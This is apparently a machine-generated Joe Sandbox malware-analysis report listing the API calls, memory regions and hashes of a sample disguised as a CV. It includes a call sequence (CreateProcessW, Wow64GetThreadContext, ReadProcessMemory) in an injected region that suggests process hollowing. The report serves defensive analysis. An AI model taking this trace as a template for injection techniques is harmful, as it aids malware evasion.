                                                                                          • Part of subcall function 00384517: _fseek.LIBCMT ref: 0038452F
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC65D
                                                                                          • Part of subcall function 003CC56D: _wcscmp.LIBCMT ref: 003CC670
                                                                                        • _free.LIBCMT ref: 003CC4DD
                                                                                        • _free.LIBCMT ref: 003CC4E4
                                                                                        • _free.LIBCMT ref: 003CC54F
                                                                                          • Part of subcall function 003A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003A7A85), ref: 003A1CB1
                                                                                          • Part of subcall function 003A1C9D: GetLastError.KERNEL32(00000000,?,003A7A85), ref: 003A1CC3
                                                                                        • _free.LIBCMT ref: 003CC557
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID:
                                                                                        • API String ID: 1552873950-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0039EBB2
                                                                                          • Part of subcall function 003851AF: _memset.LIBCMT ref: 0038522F
                                                                                          • Part of subcall function 003851AF: _wcscpy.LIBCMT ref: 00385283
                                                                                          • Part of subcall function 003851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00385293
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 0039EC07
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0039EC16
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003F3C88
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 003CC72F
                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003CC746
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Temp$FileNamePath
                                                                                        • String ID: aut
                                                                                        • API String ID: 3285503233-3010740371
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00385022
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 003850CB
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell__memset
                                                                                        • String ID:
                                                                                        • API String ID: 928536360-0
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A81C2: __NMSG_WRITE.LIBCMT ref: 003A81E9
                                                                                          • Part of subcall function 003A81C2: __NMSG_WRITE.LIBCMT ref: 003A81F3
                                                                                        • __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A821F: GetModuleFileNameW.KERNEL32(00000000,00440312,00000104,00000000,00000001,00000000), ref: 003A82B1
                                                                                          • Part of subcall function 003A821F: ___crtMessageBoxW.LIBCMT ref: 003A835F
                                                                                          • Part of subcall function 003A1145: ___crtCorExitProcess.LIBCMT ref: 003A114B
                                                                                          • Part of subcall function 003A1145: ExitProcess.KERNEL32 ref: 003A1154
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003CC385,?,?,?,?,?,00000004), ref: 003CC6F2
                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003CC708
                                                                                        • CloseHandle.KERNEL32(00000000,?,003CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003CC70F
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 003CBB72
                                                                                          • Part of subcall function 003A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,003A7A85), ref: 003A1CB1
                                                                                          • Part of subcall function 003A1C9D: GetLastError.KERNEL32(00000000,?,003A7A85), ref: 003A1CC3
                                                                                        • _free.LIBCMT ref: 003CBB83
                                                                                        • _free.LIBCMT ref: 003CBB95
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        APIs
                                                                                          • Part of subcall function 003822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,003824F1), ref: 00382303
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 003825A1
                                                                                        • CoInitialize.OLE32(00000000), ref: 00382618
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003F503A
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3815369404-0
                                                                                        APIs
                                                                                        • _strcat.LIBCMT ref: 003E08FD
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • _wcscpy.LIBCMT ref: 003E098C
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf_strcat_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1012013722-0
                                                                                        APIs
                                                                                        • IsThemeActive.UXTHEME ref: 00383A73
                                                                                          • Part of subcall function 003A1405: __lock.LIBCMT ref: 003A140B
                                                                                          • Part of subcall function 00383ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00383AF3
                                                                                          • Part of subcall function 00383ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383B08
                                                                                          • Part of subcall function 00383D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00383AA3,?), ref: 00383D45
                                                                                          • Part of subcall function 00383D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00383AA3,?), ref: 00383D57
                                                                                          • Part of subcall function 00383D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,00441148,00441130,?,?,?,?,00383AA3,?), ref: 00383DC8
                                                                                          • Part of subcall function 00383D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00383AA3,?), ref: 00383E48
                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00383AB3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                        • String ID:
                                                                                        • API String ID: 924797094-0
                                                                                        • Opcode ID: b4db812d0f91ea9a1b73d973cbec3ed579159950328a68bdbb4b31d41cc7ac09
                                                                                        • Instruction ID: 134b7c6789eea2eedb1110d717816a7cd6e7ad6835d427220fdc7accdf360575
                                                                                        • Opcode Fuzzy Hash: b4db812d0f91ea9a1b73d973cbec3ed579159950328a68bdbb4b31d41cc7ac09
                                                                                        • Instruction Fuzzy Hash: D3119D759043419BC701EF69E94591AFBE8EF95710F00892EF5848B2B1DB709584CF96
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 003AEA29
                                                                                        • __close_nolock.LIBCMT ref: 003AEA42
                                                                                          • Part of subcall function 003A7BDA: __getptd_noexit.LIBCMT ref: 003A7BDA
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 1046115767-0
                                                                                        • Opcode ID: b3884352e05f3a0666ceb4cde80fcfa30bfc2e879bb607b2bc640c89380d7bf9
                                                                                        • Instruction ID: 5f116db3721991cd580bd147a790627338fd8534a21f157a09dda46c3fa00251
                                                                                        • Opcode Fuzzy Hash: b3884352e05f3a0666ceb4cde80fcfa30bfc2e879bb607b2bc640c89380d7bf9
                                                                                        • Instruction Fuzzy Hash: D21161B3909A109AD713BF68D9827597A61EF83331F2A4350E4345F1E3CBB88D4197A5
                                                                                        APIs
                                                                                          • Part of subcall function 003A395C: __FF_MSGBANNER.LIBCMT ref: 003A3973
                                                                                          • Part of subcall function 003A395C: __NMSG_WRITE.LIBCMT ref: 003A397A
                                                                                          • Part of subcall function 003A395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,0039F507,?,0000000E), ref: 003A399F
                                                                                        • std::exception::exception.LIBCMT ref: 0039F51E
                                                                                        • __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                          • Part of subcall function 003A6805: RaiseException.KERNEL32(?,?,0000000E,00436A30,?,?,?,0039F538,0000000E,00436A30,?,00000001), ref: 003A6856
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 3902256705-0
                                                                                        • Opcode ID: fbc86824edc6a01c60a02912c5bb3bf761430232f95cde5697d95f38c89dd676
                                                                                        • Instruction ID: 88abe1667c6cc2128043e40d2ec4a918f8fe8c3dc68083ca50db6a3ff3db6c7a
                                                                                        • Opcode Fuzzy Hash: fbc86824edc6a01c60a02912c5bb3bf761430232f95cde5697d95f38c89dd676
                                                                                        • Instruction Fuzzy Hash: AEF0283150020E6BCB02BF9CDC029EE77ACDF02314F658036F908E6081CBB4D64487A9
                                                                                        APIs
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        • __lock_file.LIBCMT ref: 003A3629
                                                                                          • Part of subcall function 003A4E1C: __lock.LIBCMT ref: 003A4E3F
                                                                                        • __fclose_nolock.LIBCMT ref: 003A3634
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 12ba72b3f8cd1919c27ab9bf6e47ee60669be598c1cb3a6b848a48c004e4997a
                                                                                        • Instruction ID: 4d7941248922398a8050b0dbea73d66350f6f3184ecd2bc866ce2412225044c4
                                                                                        • Opcode Fuzzy Hash: 12ba72b3f8cd1919c27ab9bf6e47ee60669be598c1cb3a6b848a48c004e4997a
                                                                                        • Instruction Fuzzy Hash: F8F0B471901604AAD713BF69884776EBAA0EF53330F2A8109F460AF2E1CB7C8A419F55
                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 019FBA53
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 019FBAE9
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 019FBB0B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                        • Instruction ID: a4b01ddb63f4eb949e3f28c6644799fc7f2b8aa9e100986c2bcce09769ed88c0
                                                                                        • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                        • Instruction Fuzzy Hash: 8212DD24E24658C6EB24DF64D8507DEB272EF68301F1090ED910DEB7A4E77A4F81CB5A
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038E959
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: 7ab26611c2cd2f02a8568bcb3634c1f3f3c32764b4f09c40a6b56e9719d8df57
                                                                                        • Instruction ID: 4956f86d955aaf85aa9fed7016f3736b5100960fe9f17a4cebee13f6ef410d90
                                                                                        • Opcode Fuzzy Hash: 7ab26611c2cd2f02a8568bcb3634c1f3f3c32764b4f09c40a6b56e9719d8df57
                                                                                        • Instruction Fuzzy Hash: 8681D8709087849FEF27DF24C4447697BD0AB52304F0A49BEEE898B262D775D889CB52
                                                                                        APIs
                                                                                        • __flush.LIBCMT ref: 003A2A0B
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __flush__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 4101623367-0
                                                                                        • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction ID: 09cb368ff4ed72ca149ad15614b806921a293866bf282408fdb789f81768ee66
                                                                                        • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                                                        • Instruction Fuzzy Hash: 77419031700706AFDF2A8FADC8819AF7BA6EF46760F25852DE855CB240EB70DD518B40
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 7b640dd270a1f4985382beb5a0ef842ab5751bdc12af5c7b236e8f023f0c08eb
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 6A31F470A00105DFDB1ADF58C490A69FBB6FF49340B6586A5E40ACB766DB31EDC1CB80
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: df86d46202b3770112d9e09043a190d2575b9a687f3fa848423890af914dba62
                                                                                        • Instruction ID: 9a21ec7600b11b036e881e1c8b5bcb00ca9e23086294dc1fc07f7a31a5ee097d
                                                                                        • Opcode Fuzzy Hash: df86d46202b3770112d9e09043a190d2575b9a687f3fa848423890af914dba62
                                                                                        • Instruction Fuzzy Hash: E031B075104A68DFCF06AF41D08066E7BB4FF49320F10854AEA955F3D6D7B0A985CF91
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        APIs
                                                                                          • Part of subcall function 00384214: FreeLibrary.KERNEL32(00000000,?), ref: 00384247
                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003839FE,?,00000001), ref: 003841DB
                                                                                          • Part of subcall function 00384291: FreeLibrary.KERNEL32(00000000), ref: 003842C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load
                                                                                        • String ID:
                                                                                        • API String ID: 2391024519-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        APIs
                                                                                        • ___lock_fhandle.LIBCMT ref: 003AAFC0
                                                                                          • Part of subcall function 003A7BDA: __getptd_noexit.LIBCMT ref: 003A7BDA
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 003A2AED
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,003839FE,?,00000001), ref: 00384286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003840C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000001F4), ref: 019FC2A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 003EF87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003EF8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003EF919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003EF940
                                                                                        • SendMessageW.USER32 ref: 003EF966
                                                                                        • _wcsncpy.LIBCMT ref: 003EF9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 003EF9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 003EFA00
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003EFA16
                                                                                        • GetKeyState.USER32(00000010), ref: 003EFA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003EFA4F
                                                                                        • SendMessageW.USER32 ref: 003EFA72
                                                                                        • SendMessageW.USER32(?,00001030,?,003EE059), ref: 003EFB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 003EFB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003EFB96
                                                                                        • SetCapture.USER32(?), ref: 003EFB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003EFC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 003EFC29
                                                                                        • ReleaseCapture.USER32 ref: 003EFC34
                                                                                        • GetCursorPos.USER32(?), ref: 003EFC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 003EFC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003EFCD8
                                                                                        • SendMessageW.USER32 ref: 003EFD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003EFD41
                                                                                        • SendMessageW.USER32 ref: 003EFD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003EFD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003EFD8F
                                                                                        • GetCursorPos.USER32(?), ref: 003EFDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 003EFDBD
                                                                                        • GetParent.USER32(?), ref: 003EFDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 003EFE3F
                                                                                        • SendMessageW.USER32 ref: 003EFE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003EFEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 003EFF19
                                                                                        • SendMessageW.USER32 ref: 003EFF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 003EFF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003EFFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003F004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
